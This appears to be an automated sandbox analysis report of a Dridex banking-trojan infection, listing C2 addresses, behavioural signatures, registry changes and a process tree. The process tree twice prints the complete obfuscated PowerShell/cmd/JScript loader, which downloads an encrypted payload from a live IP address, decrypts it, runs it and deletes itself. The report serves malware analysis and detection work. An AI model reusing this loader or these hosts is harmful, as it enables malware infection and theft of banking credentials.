dridex | hxxps://tracker[.]usemoney[.]xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI

Resubmissions

18-11-2020 16:55

201118-se861xnrva 10

16-11-2020 11:25

201116-szw4la68y6 10

Analysis

max time kernel
253s
max time network
254s
platform
windows7_x64
resource
win7v20201028
submitted
16-11-2020 11:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI

Score

10^/10

dridex 10111 botnet discovery evasion loader ransomware trojan

Malware Config

Extracted

Family

dridex

Botnet

10111

194.150.118.7:443

49.212.179.180:3889

69.64.62.4:4443

rc4.plain

Signatures

Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
botnet dridex

Dridex Loader 1 IoCs

Detects Dridex both x86 and x64 loader in memory.

botnet loader

Processes:

resource	yara_rule
behavioral2/memory/780-62-0x0000000000400000-0x000000000043D000-memory.dmp	dridex_ldr

Blocklisted process makes network request 2 IoCs

Processes:

wscript.exewscript.exe

flow pid process

19 1352 wscript.exe
20 1512 wscript.exe
Executes dropped EXE 1 IoCs

Processes:

djadi.exe

pid process

780 djadi.exe
Loads dropped DLL 2 IoCs

Processes:

cmd.exe

pid process

1820 cmd.exe
1820 cmd.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

djadi.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA djadi.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082

flow	pid	process
19	1352	wscript.exe
20	1512	wscript.exe

pid	process
780	djadi.exe

pid	process
1820	cmd.exe
1820	cmd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	djadi.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 007eed3713bcd601	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000dae278a3d11644856952b6a5a98c924839ec895d53b3b47b5b79445071da69f7000000000e80000000020000200000002765e156a02b525d9c4a285567059f662e567791f24bf12a934b7f48d1c5a04a900000001bbafb97fa28ff585e4cf1d903a40c0b7e802f09657fe4c7258ce7a80caae9ec8f96da9c5fee83a3ecfa6fb20a5f1d6fe5ab76cc24a4996251b3cba9e0eaa7d78454bf23f3ffcf4d27467b3c668fb010a96a24e71d826c86907462ebda4d9d8de4fcb1e0592b30739189f8aacd92670266bd2b4003d2745a3ea1e3664cc88741459242f3e319a507ae3eaee6406917f740000000d472dbc1ec27544e9a8b9d1629db1a2370e8d6c68a88d021cee64295cd72c2b56cc2a4ed8c09d5e9b4072b18bb2e7d30770d210cf76dcdc3919eef3e692351ae	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5ADFCC71-2806-11EB-9964-C611B4A1F110} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "312294308"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000cf1e2843ca566257223ef0d1fd9f9d99bb18c911119497c4201c413fc6b3a448000000000e80000000020000200000008c71929146512bf0817b10b860a1123882b03f54be1c97f4c1e7c0813fe833d3200000000ad320ccbc277f3321364ee3b986ff143296f634e91018f5f8c70aa076bda2e74000000050f21215b5bb34fafcc16f8cfd16d89e8dddac10219f22ed3ba2f168398ba49a61b4a4e5cce385a70564872e47b93a0defabf85a5312ab7b2a8015930f0f5719	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

PowerShell.exePowerShell.exe

pid process

1252 PowerShell.exe
748 PowerShell.exe
1252 PowerShell.exe
748 PowerShell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

PowerShell.exePowerShell.exe

description pid process

Token: SeDebugPrivilege 1252 PowerShell.exe
Token: SeDebugPrivilege 748 PowerShell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1772 iexplore.exe

pid	process
1252	PowerShell.exe
748	PowerShell.exe
1252	PowerShell.exe
748	PowerShell.exe

description	pid	process
Token: SeDebugPrivilege	1252	PowerShell.exe
Token: SeDebugPrivilege	748	PowerShell.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
1772	iexplore.exe
1772	iexplore.exe
844	IEXPLORE.EXE
844	IEXPLORE.EXE
1164	IEXPLORE.EXE
1164	IEXPLORE.EXE
1264	IEXPLORE.EXE
1264	IEXPLORE.EXE
1264	IEXPLORE.EXE
1264	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEPowerShell.execmd.exePowerShell.execmd.exewscript.execmd.exe

description	pid	process	target process
PID 1772 wrote to memory of 844	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 844	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 844	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 844	1772	iexplore.exe	IEXPLORE.EXE
PID 844 wrote to memory of 748	844	IEXPLORE.EXE	PowerShell.exe
PID 844 wrote to memory of 748	844	IEXPLORE.EXE	PowerShell.exe
PID 844 wrote to memory of 748	844	IEXPLORE.EXE	PowerShell.exe
PID 844 wrote to memory of 748	844	IEXPLORE.EXE	PowerShell.exe
PID 1772 wrote to memory of 1164	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 1164	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 1164	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 1164	1772	iexplore.exe	IEXPLORE.EXE
PID 1164 wrote to memory of 1252	1164	IEXPLORE.EXE	PowerShell.exe
PID 1164 wrote to memory of 1252	1164	IEXPLORE.EXE	PowerShell.exe
PID 1164 wrote to memory of 1252	1164	IEXPLORE.EXE	PowerShell.exe
PID 1164 wrote to memory of 1252	1164	IEXPLORE.EXE	PowerShell.exe
PID 1772 wrote to memory of 1264	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 1264	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 1264	1772	iexplore.exe	IEXPLORE.EXE
PID 1772 wrote to memory of 1264	1772	iexplore.exe	IEXPLORE.EXE
PID 748 wrote to memory of 1604	748	PowerShell.exe	cmd.exe
PID 748 wrote to memory of 1604	748	PowerShell.exe	cmd.exe
PID 748 wrote to memory of 1604	748	PowerShell.exe	cmd.exe
PID 748 wrote to memory of 1604	748	PowerShell.exe	cmd.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	wscript.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	wscript.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	wscript.exe
PID 1604 wrote to memory of 1512	1604	cmd.exe	wscript.exe
PID 1252 wrote to memory of 1836	1252	PowerShell.exe	cmd.exe
PID 1252 wrote to memory of 1836	1252	PowerShell.exe	cmd.exe
PID 1252 wrote to memory of 1836	1252	PowerShell.exe	cmd.exe
PID 1252 wrote to memory of 1836	1252	PowerShell.exe	cmd.exe
PID 1836 wrote to memory of 1352	1836	cmd.exe	wscript.exe
PID 1836 wrote to memory of 1352	1836	cmd.exe	wscript.exe
PID 1836 wrote to memory of 1352	1836	cmd.exe	wscript.exe
PID 1836 wrote to memory of 1352	1836	cmd.exe	wscript.exe
PID 1512 wrote to memory of 1820	1512	wscript.exe	cmd.exe
PID 1512 wrote to memory of 1820	1512	wscript.exe	cmd.exe
PID 1512 wrote to memory of 1820	1512	wscript.exe	cmd.exe
PID 1512 wrote to memory of 1820	1512	wscript.exe	cmd.exe
PID 1820 wrote to memory of 780	1820	cmd.exe	djadi.exe
PID 1820 wrote to memory of 780	1820	cmd.exe	djadi.exe
PID 1820 wrote to memory of 780	1820	cmd.exe	djadi.exe
PID 1820 wrote to memory of 780	1820	cmd.exe	djadi.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://tracker.usemoney.xyz/zero?cep=0INPp9du4Bhy2Xz68yYOO6a5ujZtlV9xjhCnT4cUZDhJTx-jvv2D7Xi7jVwUhpJlo52vu4233Dm8ltmYLtJBfRge5Y4P62wXpwlT5acD4EDeDh7SM9D2zGMogvUYSihxAPb3O-SGVz12pJSSOF_GkBl1TKhEvSdp2oFvg7mVhJ0JNv3-cJSDfq9kxqE8b3I2YY5ooRjr2_qD7697Z8O4qWS9CvsZsz3GdP2JCZHBd6eW1OW2yHbz1qmvA2USlnAwDkR7WL6G3w4S4IuDzYz8FzCYvEWcPp7pgD3Dt6xrsNTTCyeKXpNBsDVCSIMJ9La8Hv-IXSYDztDY64Kx35t8o7h5Bl2a5jQ9ggtADAWfMvI
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1772

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2^&etwFDTh^&bCbREhj=filly^&VTZ=consignment^&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL^&HTOqRDUr=abettor^&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w^&yCi=accelerator^&JEiQb=border^&UVcGD=mustard^&ceSzWJ=filly^&Wajv=neighboring^&YmcyIHZL=community^&nkIl=difference^&LIWRIRsPQ=disagree^&MsVpBcv=mustard^&NiLrfEXSQNzkxNTE= "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tmp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2^&etwFDTh^&bCbREhj=filly^&VTZ=consignment^&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL^&HTOqRDUr=abettor^&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w^&yCi=accelerator^&JEiQb=border^&UVcGD=mustard^&ceSzWJ=filly^&Wajv=neighboring^&YmcyIHZL=community^&nkIl=difference^&LIWRIRsPQ=disagree^&MsVpBcv=mustard^&NiLrfEXSQNzkxNTE= 1
4⤵
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?MzE2ODE2&etwFDTh&bCbREhj=filly&VTZ=consignment&ohjgjhdfg5=wn_QMvXcLhXQFYPCJPPcTKREM1HRHESD2YubnLG3Yp_NZGX_0_HDfF_wrwrcCl6JtcMoL&HTOqRDUr=abettor&hfghfgcv3=roCbFHghEWJegYznYwJUF5BpqGvhkKEzBXNhJWE_BTeZA1G_5KcJLA92VnxzIFJMMgm9w&yCi=accelerator&JEiQb=border&UVcGD=mustard&ceSzWJ=filly&Wajv=neighboring&YmcyIHZL=community&nkIl=difference&LIWRIRsPQ=disagree&MsVpBcv=mustard&NiLrfEXSQNzkxNTE= 1
5⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c djadi.exe
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1820

C:\Users\Admin\AppData\Local\Temp\djadi.exe
djadi.exe
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:780

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:340994 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3^&ihcvWpRrq^&NKzW=irreverent^&eHlPRdjuM=border^&KCvwqAaL=disagree^&bauGNAYyB=professional^&CDXgqQgGI=abettor^&XiPLJ=difference^&KhpVstUR=neighboring^&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT^&vNO=callous^&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA^&queHTbi=consignment^&ZYCNHy=filly^&ZQwWEDouB=community^&JfHK=disagree^&xLnlKUhhWMzAzOTkx "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tmp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3^&ihcvWpRrq^&NKzW=irreverent^&eHlPRdjuM=border^&KCvwqAaL=disagree^&bauGNAYyB=professional^&CDXgqQgGI=abettor^&XiPLJ=difference^&KhpVstUR=neighboring^&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT^&vNO=callous^&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA^&queHTbi=consignment^&ZYCNHy=filly^&ZQwWEDouB=community^&JfHK=disagree^&xLnlKUhhWMzAzOTkx 1
4⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp hfg45dfgg http://49.12.117.170/?NDc2ODM3&ihcvWpRrq&NKzW=irreverent&eHlPRdjuM=border&KCvwqAaL=disagree&bauGNAYyB=professional&CDXgqQgGI=abettor&XiPLJ=difference&KhpVstUR=neighboring&ohjgjhdfg5=z3zQMvXcJwDQC4rCJOXAT6FbNk3YH1iOwJH_783ORZzxOWPPk-rBDV3xrh3yT&vNO=callous&hfghfgcv3=1WDpKEkLLJZPFHgjxGEKQQwlIZeA19C86utiECGzBGcgJ6y_hOIZg11otKWJA&queHTbi=consignment&ZYCNHy=filly&ZQwWEDouB=community&JfHK=disagree&xLnlKUhhWMzAzOTkx 1
5⤵
- Blocklisted process makes network request
PID:1352

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:209934 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1264

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

